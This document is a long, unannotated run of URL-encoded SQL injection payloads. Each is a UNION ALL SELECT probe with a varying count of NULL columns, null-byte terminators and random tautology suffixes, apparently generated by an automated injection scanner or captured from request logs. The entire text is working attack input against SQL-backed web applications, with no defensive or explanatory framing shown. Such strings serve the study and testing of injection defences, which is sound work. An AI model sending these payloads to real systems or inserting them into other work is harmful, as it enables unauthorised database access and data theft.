1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27zXep%27%3D%27zXep 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27gIxW%27%3D%27gIxW 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27UYgH%27%3D%27UYgH 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27Huqu%27%3D%27Huqu 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27eJcn%27%3D%27eJcn 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27xyXW%27%3D%27xyXW 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27bOEQ%27%3D%27bOEQ 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27yJEh%27%3D%27yJEh 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27OqQG%27%3D%27OqQG 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27hwxb%27%3D%27hwxb 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27OuQn%27%3D%27OuQn 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27USYu%27%3D%27USYu 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27IbFy%27%3D%27IbFy 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27OVYz%27%3D%27OVYz 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27gIrM%27%3D%27gIrM 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27sUeX%27%3D%27sUeX 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27khiW%27%3D%27khiW 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27vsgn%27%3D%27vsgn 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27rrXP%27%3D%27rrXP 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27TXmE%27%3D%27TXmE 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27OwLi%27%3D%27OwLi 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27GqeU%27%3D%27GqeU 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27TzWe%27%3D%27TzWe 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27BhFa%27%3D%27BhFa 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27YfrR%27%3D%27YfrR 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27DTGf%27%3D%27DTGf 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27XoSQ%27%3D%27XoSQ 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27oxPH%27%3D%27oxPH 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27dGhV%27%3D%27dGhV 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27ZPVg%27%3D%27ZPVg 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27CAPN%27%3D%27CAPN 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27iGfs%27%20LIKE%20%27iGfs 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27rqya%27%20LIKE%20%27rqya 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27PVNg%27%20LIKE%20%27PVNg 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27ZPPt%27%20LIKE%20%27ZPPt 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27xsJe%27%20LIKE%20%27xsJe 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27gTHs%27%20LIKE%20%27gTHs 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27OBoI%27%20LIKE%20%27OBoI 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27Ciob%27%20LIKE%20%27Ciob 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27Byjc%27%20LIKE%20%27Byjc 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27yIBV%27%20LIKE%20%27yIBV 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27kLsO%27%20LIKE%20%27kLsO 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27pmct%27%20LIKE%20%27pmct 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27oage%27%20LIKE%20%27oage 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27zCnD%27%20LIKE%20%27zCnD 